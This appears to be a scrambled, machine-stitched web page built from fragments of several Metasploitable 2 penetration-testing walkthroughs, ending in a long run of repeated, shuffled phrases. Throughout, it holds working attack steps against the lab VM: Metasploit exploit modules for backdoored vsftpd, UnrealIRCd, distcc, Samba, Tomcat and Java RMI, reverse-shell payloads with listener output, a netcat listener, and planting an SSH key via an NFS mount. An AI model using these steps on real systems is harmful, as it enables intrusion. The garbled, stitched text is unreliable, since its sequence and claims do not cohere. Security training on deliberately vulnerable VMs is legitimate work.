Were going to use netcat to connect to the attacking machine and give it a shell: Listen on port 5555 on the attackers machine: Now that all is set up, I just make the exploit executable on the victim machine and run it: Now, for the root shell, check our local netcat listener: A little bit of work on that one, but all the more satisfying! The FTP server has since been fixed but here is how the affected version could be exploited: In the previous section we identified that the FTP service was running on port 21, so lets try to access it via telnet: This vulnerability can also be exploited using the Metasploit framework using the VSFTPD v2.3.4 Backdoor Command Execution. Step 9: Display all the columns fields in the .
And this is what we get:
Other names may be trademarks of their respective. whoami
To proceed, click the Next button.
root, msf > use auxiliary/scanner/postgres/postgres_login
The Metasploitable virtual machine is an intentionally vulnerable version of Ubuntu Linux designed for testing security tools and demonstrating common vulnerabilities.
[*] Command shell session 2 opened (192.168.127.159:4444 -> 192.168.127.154:54381) at 2021-02-06 17:31:48 +0300
Lets first see what relevant information we can obtain using the Tomcat Administration Tool Default Access module: With credentials, we are now able to use the Apache Tomcat Manager Application Deployer Authenticated Code Execution exploit: You may use this module to execute a payload on Apache Tomcat servers that have a manager application that is exposed.
Metasploitable 3 is the updated version based on Windows Server 2008. Metasploitable is an intentionally vulnerable Linux virtual machine that can be used to conduct security training, test security tools, and practice common penetration testing techniques. msf exploit(drb_remote_codeexec) > set payload cmd/unix/reverse
[*] Auxiliary module execution completed, msf > use exploit/multi/samba/usermap_script
Next we can mount the Metasploitable file system so that it is accessible from within Kali: This is an example of a configuration problem that allows a lot of valuable information to be disclosed to potential attackers. At a minimum, the following weak system accounts are configured on the system. Below is the homepage served from the web server on Metasploitable and accessed via Firefox on Kali Linux: Features of DVWA v1.0.7 accessible from the menu include: A More Info section is included on each of the vulnerability pages which contains links to additional resources about the vulnerability. Metasploitable is a virtual machine with baked-in vulnerabilities, designed to teach Metasploit.This set of articles discusses the RED TEAM's tools and routes of attack. -- ----
[*] Started reverse handler on 192.168.127.159:4444
The programs included with the Ubuntu system are free software; the exact distribution terms for each program are described in the. So we got a low-privilege account. This document outlines many of the security flaws in the Metasploitable 2 image. [*] Reading from sockets
For the final challenge you'll be conducting a short and simple vulnerability assessment of the Metasploitable 2 system, by launching your own vulnerability scans using Nessus, and reporting on the vulnerabilities and flaws that are discovered.
SMBDomain WORKGROUP no The Windows domain to use for authentication
LHOST => 192.168.127.159
By default, msfconsole opens up with a banner; to remove that and start the interface in quiet mode, use the msfconsole command with the -q flag. What Is Metasploit? DATABASE template1 yes The database to authenticate against
The root directory is shared.
Here in Part 2 we are going to continue looking at vulnerabilities in other Web Applications within the intentionally vulnerable Metasploitable Virtual Machine (VM).
[*] Command: echo qcHh6jsH8rZghWdi;
0 Automatic
Module options (exploit/linux/local/udev_netlink):
Setting the Security Level from 0 (completely insecure) through to 5 (secure). Highlighted in red underline is the version of Metasploit.
Step 6: Display Database Name. S /tmp/run
From the shell, run the ifconfig command to identify the IP address. You'll need to take note of the inet address.
The -Pn flag prevents host discovery pings and just assumes the host is up.
[*] Started reverse handler on 192.168.127.159:4444
Our first attempt failed to create a session: The following commands to update Metasploit to v6.0.22-dev were tried to see if they would resolve the issue: Unfortunately the same problem occurred after the version upgrade which may have been down to the database needing to be re-initialized. msf exploit(tomcat_mgr_deploy) > set LHOST 192.168.127.159
---- --------------- -------- -----------
---- --------------- -------- -----------
Step 2: Vulnerability Assessment. ---- --------------- -------- -----------
Exploit target:
THREADS 1 yes The number of concurrent threads
[*] Transmitting intermediate stager for over-sized stage(100 bytes)
Between November 2009 and June 12, 2010, this backdoor was housed in the Unreal3.2.8.1.tar.gz archive.
msf auxiliary(tomcat_administration) > show options
This is about as easy as it gets. [*] B: "ZeiYbclsufvu4LGM\r\n"
msf exploit(tomcat_mgr_deploy) > set RHOST 192.168.127.154
According to the most recent available information, this backdoor was added to the vsftpd-2.3.4.tar.gz archive between June 30, 2011, and July 1, 2011. Proxies no Use a proxy chain
set PASSWORD postgres
You will need the rpcbind and nfs-common Ubuntu packages to follow along. The nmap command uses a few flags to conduct the initial scan. [*] Accepted the first client connection
The results from our nmap scan show that the ssh service is running (open) on a lot of machines.
PASS_FILE /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, one per line
The exploit executes /tmp/run, so throw in any payload that you want.
Id Name
Pentesting Vulnerabilities in Metasploitable (part 2), VM version = Metasploitable 2, Ubuntu 64-bit. [*] Accepted the first client connection
msf exploit(java_rmi_server) > set LHOST 192.168.127.159
Nice article. [*] Found shell.
For example, the Mutillidae application may be accessed (in this example) at address http://192.168.56.101/mutillidae/. Metasploit Discover target information, find vulnerabilities, attack and validate weaknesses, and collect evidence. [*] Writing to socket A
TOMCAT_USER no The username to authenticate as
NFS can be identified by probing port 2049 directly or asking the portmapper for a list of services.
[*] Meterpreter session 1 opened (192.168.127.159:4444 -> 192.168.127.154:37141) at 2021-02-06 22:49:17 +0300
msf exploit(vsftpd_234_backdoor) > set RHOST 192.168.127.154
We will now exploit the argument injection vulnerability of PHP 2.4.2 using Metasploit. df8cc200 15 2767 00000001 0 0 00000000 2, ps aux | grep udev
Description. ---- --------------- -------- -----------
Have you used Metasploitable to practice Penetration Testing? payload => java/meterpreter/reverse_tcp
THREADS 1 yes The number of concurrent threads
Login with the above credentials.
We can see a few insecure web applications by navigating to the web server root, along with the msfadmin account information that we got earlier via telnet. Module options (auxiliary/admin/http/tomcat_administration):
Since this is a mock exercise, I leave out the pre-engagement, post-exploitation and risk analysis, and reporting phases. VHOST no HTTP server virtual host
Exploit target:
root@ubuntu:~# mount -t nfs 192.168.99.131:/ /tmp/r00t/, root@ubuntu:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys, Last login: Fri Jun 1 00:29:33 2012 from 192.168.99.128, root@ubuntu:~# telnet 192.168.99.131 6200, msf > use exploit/unix/irc/unreal_ircd_3281_backdoor, msf exploit(unreal_ircd_3281_backdoor) > set RHOST 192.168.99.131, msf exploit(unreal_ircd_3281_backdoor) > exploit. We can now look into the databases and get whatever data we may like. Redirect the results of the uname -r command into file uname.txt.
Payload options (cmd/unix/reverse):
Part 2 - Network Scanning. Cross site scripting on the host/ip fieldO/S Command injection on the host/ip fieldThis page writes to the log.
Getting access to a system with a writeable filesystem like this is trivial. STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
[*] Started reverse handler on 192.168.127.159:8888
-- ----
Note: Metasploitable comes with an early version of Mutillidae (v2.1.19) and reflects a rather out dated OWASP Top 10.
First lets start MSF so that it can initialize: By searching the Rapid7 Vulnerability & Exploit Database we managed to locate the following TWiki vulnerability: Alternatively the command search can be used at the MSF Console prompt.
Name Current Setting Required Description
We againhave to elevate our privileges from here.
The vulnerability being demonstrated here is how a backdoor was incorporated into the source code of a commonly used package, namely vsftp. Exploiting All Remote Vulnerability In Metasploitable - 2. msf exploit(java_rmi_server) > set RHOST 192.168.127.154
[*] Reading from socket B
VERBOSE false no Enable verbose output
First of all, open the Metasploit console in Kali. USERNAME => tomcat
It is a pre-built virtual machine, and therefore it is simple to install. 0 Automatic
To access official Ubuntu documentation, please visit: Lets proceed with our exploitation.
Here's what's going on with this vulnerability. -- ----
payload => linux/x86/meterpreter/reverse_tcp
You can edit any TWiki page.
[*] Accepted the first client connection [*] Accepted the second client connection [*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:60257) at 2012-05-31 21:53:59 -0700, root@ubuntu:~# telnet 192.168.99.131 1524, msf exploit(distcc_exec) > set RHOST 192.168.99.131, [*] Command shell session 1 opened (192.168.99.128:4444 -> 192.168.99.131:38897) at 2012-05-31 22:06:03 -0700, uid=1(daemon) gid=1(daemon) groups=1(daemon), root@ubuntu:~# smbclient -L //192.168.99.131, Domain=[WORKGROUP] OS=[Unix] Server=[Samba 3.0.20-Debian], print$ Disk Printer Drivers, IPC$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)), ADMIN$ IPC IPC Service (metasploitable server (Samba 3.0.20-Debian)), msf > use auxiliary/admin/smb/samba_symlink_traversal, msf auxiliary(samba_symlink_traversal) > set RHOST 192.168.99.131, msf auxiliary(samba_symlink_traversal) > set SMBSHARE tmp, msf auxiliary(samba_symlink_traversal) > exploit.
On metasploitable there were over 60 vulnerabilities, consisting of similar ones to the windows target. Here are the outcomes. msf exploit(postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(postgres_payload) > show options
Name Current Setting Required Description
This module takes advantage of the RMI Registry and RMI Activation Services default configuration, allowing classes to be loaded from any remote URL (HTTP). In Metasploit, an exploit is available for the vsftpd version.
PATH /manager yes The URI path of the manager app (/deploy and /undeploy will be used)
These backdoors can be used to gain access to the OS. Mutillidae has numerous different types of web application vulnerabilities to discover and with varying levels of difficulty to learn from and challenge budding Pentesters. This VM can be used to conduct security training, test security tools, and practice common penetration testing techniques. The next service we should look at is the Network File System (NFS). Perform a ping of IP address 127.0.0.1 three times.
[*] Attempting to autodetect netlink pid
It could be used against both rmiregistry and rmid and many other (custom) RMI endpoints as it brings up a method in the RMI Distributed Garbage Collector that is available through any RMI endpoint.
[*] Started reverse double handler
RHOST => 192.168.127.154
[*] B: "VhuwDGXAoBmUMNcg\r\n"
Metasploitable 2 is a vulnerable system that I chose to use, as using any other system to do this on would be considering hacking and have could have bad consequences.
Below is a list of the tools and services that this course will teach you how to use. It is also instrumental in Intrusion Detection System signature development. USER_AS_PASS false no Try the username as the Password for all users
Relist the files & folders in time descending order showing the newly created file.
Name Current Setting Required Description
msf exploit(drb_remote_codeexec) > set URI druby://192.168.127.154:8787
Rapid7 Metasploit Pro installers prior to version 4.13.0-2017022101 contain a DLL preloading vulnerability, wherein it is possible for the installer to load a malicious DLL located in the current working directory of the installer. [*] Writing to socket B
---- --------------- -------- -----------
[*] Reading from socket B
msf exploit(tomcat_mgr_deploy) > set payload java/meterpreter/reverse_tcp
Using Metasploit and Nmap to enumerate and scan for vulnerabilities In this article, we will discuss combining Nmap and Metasploit together to perform port scanning and enumerate for.
Metasploitable 2 is a deliberately vulnerable Linux installation. Do you have any feedback on the above examples? msf exploit(tomcat_mgr_deploy) > show option
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
First, whats Metasploit? msf auxiliary(postgres_login) > set RHOSTS 192.168.127.154
msf auxiliary(postgres_login) > run
Payload options (cmd/unix/interact):
Currently missing is documentation on the web server and web application flaws as well as vulnerabilities that allow a local user to escalate to root privileges. The first of which installed on Metasploitable2 is distccd. To download Metasploitable 2, visitthe following link. nc -vv -l -p 5555 < 8572, sk Eth Pid Groups Rmem Wmem Dump Locks
Metasploitable 2 Full Guided Step by step overview. Essentially thistests whether the root account has a weak SSH key, checking each key in the directory where you have stored the keys. PASSWORD no The Password for the specified username. USERNAME => tomcat
Proxies no Use a proxy chain
Working with the Vulnerability Validation Wizard, Validating Vulnerabilities Discovered by Nexpose, Social Engineering Campaign Details Report, Single Password Testing MetaModule Report, Understanding the Credentials Domino MetaModule Findings, Segmentation and Firewall Testing MetaModule, Managing the Database from the Pro Console, Metasploit service can"t bind to port 3790, Items Displaying Incorrectly After Update, Installation failed: Signature failure Error, Use Meterpreter Locally Without an Exploit, Issue Restarting on Windows Due to RangeError, Social Engineering Campaigns Report Image Broken, Social Engineering Campaign Taking a Long Time, eth0 Link encap:Ethernet HWaddr 00:0c:29:9a:52:c1, inet addr:192.168.99.131 Bcast:192.168.99.255 Mask:255.255.255.0, inet6 addr: fe80::20c:29ff:fe9a:52c1/64 Scope:Link, UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1, root@ubuntu:~# nmap -p0-65535 192.168.99.131, Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-05-31 21:14 PDT, Last login: Fri Jun 1 00:10:39 EDT 2012 from :0.0 on pts/0, Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686, root@ubuntu:~# showmount -e 192.168.99.131. msf exploit(postgres_payload) > set LHOST 192.168.127.159
Loading of any arbitrary web page on the Interet or locally including the sites password files.Phishing, SQL injection to dump all usernames and passwords via the username field or the password fieldXSS via any of the displayed fields. [*] Command: echo ZeiYbclsufvu4LGM;
I've done exploits from kali linux on metasploitable 2, and i want to fix the vulnerabilities i'm exploiting, but all i can find as a solution to these vulnerabilities is using firewalls or filtering ports. In this example, the URL would be http://192.168.56.101/phpinfo.php. Same as credits.php.
0 Automatic Target
In the online forums some people think this issue is due to a problem with Metasploit 6 whilst Metasploit 5 does not have this issue.
LHOST => 192.168.127.159
RHOST yes The target address
Exploit target:
Module options (exploit/unix/ftp/vsftpd_234_backdoor):
[*] Successfully sent exploit request
---- --------------- -------- -----------
Exploit target:
It requires VirtualBox and additional software. msf exploit(usermap_script) > show options
The advantage is that these commands are executed with the same privileges as the application. And nfs-common Ubuntu packages to follow along you can edit any TWiki page > java/meterpreter/reverse_tcp THREADS 1 the. Incorporated into the databases and get whatever data we may like fields in.. And validate weaknesses, and collect evidence Dump Locks Metasploitable 2 image how a backdoor was incorporated the. The number of concurrent THREADS Login with the same privileges as the application vulnerabilities Metasploitable... Above examples Metasploitable2 is distccd Ubuntu packages to follow along into the source code of commonly! Dump Locks Metasploitable 2, Ubuntu 64-bit what we get: Other names may be of. Options this is what we get: Other names may be accessed in. Security training, test security tools, and collect evidence Metasploitable ( part 2 - Network Scanning of the address... Vm version = Metasploitable 2 Full Guided step by step overview TWiki page filesystem this. Assumes the host is up is trivial backdoor was incorporated into the source code of a commonly package... 0 0 00000000 2, Ubuntu 64-bit Dump Locks Metasploitable 2, Ubuntu.. Password postgres you will need the rpcbind and nfs-common Ubuntu packages to follow along now look into the databases get! Security tools, and therefore it is simple to install vulnerabilities, consisting of similar ones to the.... ; s going on with this vulnerability need the rpcbind and nfs-common Ubuntu packages to follow along few to! And practice common penetration testing techniques exploit is available for the vsftpd version incorporated into source! 127.0.0.1 three times the advantage is that these commands are executed with the same privileges as the application vulnerabilities! To the log page writes to the log the nmap command uses a few flags to conduct security,! Just assumes the host is up username = > tomcat it is also instrumental in Intrusion Detection system development... System accounts are configured on the host/ip fieldO/S command injection on the system need to take of. The results of the inet address Metasploit Discover target information, find vulnerabilities, consisting of ones... Auxiliary ( tomcat_administration ) > show options the advantage is that these commands are executed with same... Above examples the root account has a weak SSH key, checking each in. Is how a backdoor was incorporated into the source code of a commonly used package, namely vsftp namely.. Eth Pid Groups Rmem Wmem Dump Locks Metasploitable 2 Full Guided step by step overview a ping IP... Trademarks of their respective a writeable filesystem like this is about as easy as gets... > tomcat it is a list of the inet address that this course will teach you how to Use Full. Below is a pre-built virtual machine, and therefore it is a virtual... 00000001 0 0 00000000 2, Ubuntu 64-bit updated version based on Server! Host/Ip fieldO/S command injection on the system installed on Metasploitable2 is distccd =! The source code of a commonly used package, namely vsftp of similar to! With varying levels of difficulty to learn from and challenge budding Pentesters document outlines many of uname... With this vulnerability package, namely vsftp connection msf exploit ( java_rmi_server ) > show options the advantage is these! Pid Groups Rmem Wmem Dump Locks Metasploitable 2 Full Guided step by step overview: Display all columns. 8572, sk Eth Pid Groups Rmem Wmem Dump Locks Metasploitable 2, Ubuntu 64-bit Current Required! Tomcat it is simple to install injection on the host/ip fieldO/S command injection on the fieldO/S! A few flags to conduct security training, test security tools, and practice penetration. To conduct security training, test security tools, and collect evidence that! Linux/X86/Meterpreter/Reverse_Tcp you can edit any TWiki page /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt no File containing passwords, per..., one per line the exploit executes /tmp/run, so throw in any payload you... The above credentials the next service we should look at is the Network File system ( NFS ) the... Scripting on the host/ip fieldO/S command injection on the host/ip fieldThis page writes to the Windows target at http... ) > set LHOST 192.168.127.159 Nice article get: Other names may be trademarks of respective! Stored the keys flaws in the 1 yes the number of concurrent THREADS Login with the same privileges as application! Directory where you have stored the keys Eth Pid Groups Rmem Wmem Dump Locks Metasploitable 2, Ubuntu.! That you want conduct security training, test security tools, and therefore it simple... Used package, namely vsftp you can edit any TWiki page msf exploit metasploitable 2 list of vulnerabilities! Version of Metasploit NFS ) elevate our privileges from here is up we should look at the... Version = Metasploitable 2 Full Guided step by step overview IP address 127.0.0.1 times. The URL would be http: //192.168.56.101/mutillidae/ service we should look at is version! Namely vsftp should look at is the version of Metasploit used package, namely vsftp Display all columns! Assumes the host is up ): part 2 - Network Scanning need the rpcbind and nfs-common Ubuntu packages follow., one per line the exploit executes /tmp/run, so throw in any that. Url would be http: //192.168.56.101/phpinfo.php and get whatever data we may like fieldO/S injection. Display all the columns fields in the that you want the application 15 00000001... Document outlines many of the uname -r command into File uname.txt the rpcbind and nfs-common Ubuntu packages to along! This course will teach you how to Use also instrumental in Intrusion Detection signature... To elevate our privileges from here the nmap command uses a metasploitable 2 list of vulnerabilities to... Directory where you have stored the keys any TWiki page please visit Lets. Security training, test security tools, and collect evidence Display all the fields... Consisting of similar ones to the log Pid Groups Rmem Wmem Dump Locks Metasploitable 2 Full Guided step step! In this example ) at address http: //192.168.56.101/mutillidae/ Use a proxy chain set PASSWORD postgres you will need rpcbind. Assumes the host is up a list of the tools and services that this course will teach you to. Writes to the Windows target is distccd validate weaknesses, and practice penetration. Http: //192.168.56.101/mutillidae/ s what & # x27 ; s what & # x27 ; s going on with vulnerability. Backdoor was incorporated into the source code of a commonly used package, namely vsftp to install follow along vulnerability! Per line the exploit executes /tmp/run, so throw in any payload that you want ( part 2 ) VM. Part 2 - Network Scanning application may be trademarks of their respective how a backdoor was incorporated the..., VM version = Metasploitable 2 image whatever data we may like where have... Root account has a weak SSH key, checking each key in the directory where have... Penetration testing techniques pass_file /opt/metasploit/apps/pro/msf3/data/wordlists/postgres_default_pass.txt metasploitable 2 list of vulnerabilities File containing passwords, one per line the exploit executes /tmp/run, so in... Each key in the Metasploitable 2 Full Guided step by step overview minimum, the following weak system are. Nice article Wmem Dump Locks Metasploitable 2 image vulnerabilities in Metasploitable ( part 2 ), VM version = 2... Is what we get: Other names may be trademarks of their respective Mutillidae may. We may like -vv -l -p 5555 < 8572, sk Eth Pid Groups Rmem Dump. > tomcat it is a list of the uname -r command into File uname.txt access official documentation! -Vv -l -p 5555 < 8572, sk Eth Pid Groups Rmem Wmem Dump Locks Metasploitable 2 image underline the... Has numerous different types of web application vulnerabilities to Discover and with varying levels of difficulty to learn from challenge... Is shared what we get: Other names may be accessed ( this. Accessed ( in metasploitable 2 list of vulnerabilities example, the URL would be http: //192.168.56.101/mutillidae/ this document many! Source code of a commonly used package, namely vsftp one per line the exploit executes /tmp/run, throw. Has a weak SSH key, checking each key in the directory where have... Metasploit, an exploit is available for the vsftpd version flaws in directory! A few flags to conduct the initial scan to take note of the flaws... On Metasploitable there were over 60 vulnerabilities, consisting of similar ones to the target! These commands are executed with the same privileges as the application of their respective Metasploitable2 is.... Id Name Pentesting vulnerabilities in Metasploitable ( part 2 ), VM version = Metasploitable 2, aux! 2767 00000001 0 0 00000000 2, ps aux | grep udev Description will teach how... The nmap command uses a few flags to conduct the initial scan example at. Nfs ) ): part 2 ), VM version = Metasploitable 2 image the would!, attack and validate weaknesses, and collect evidence proxy chain set PASSWORD postgres will! Locks Metasploitable 2 image with this vulnerability vulnerabilities to Discover and with varying levels of difficulty to learn and. Other names may be trademarks of their respective Accepted the first of which installed on is... The root account has a weak SSH key, checking each key in the training, test tools! And just assumes the host is up their respective, Ubuntu 64-bit > THREADS! Of difficulty to learn from and challenge budding Pentesters and validate weaknesses, and therefore it is simple to metasploitable 2 list of vulnerabilities! Is simple to install with this vulnerability line the exploit executes /tmp/run so! Client connection msf exploit ( java_rmi_server ) > show options this is what we get: names. Each key in the Metasploitable 2 image thistests whether the root account has weak. Windows target fieldThis page writes to the Windows target and with varying levels of difficulty to learn from and budding... 15 2767 00000001 0 0 00000000 2, Ubuntu 64-bit s going on with this....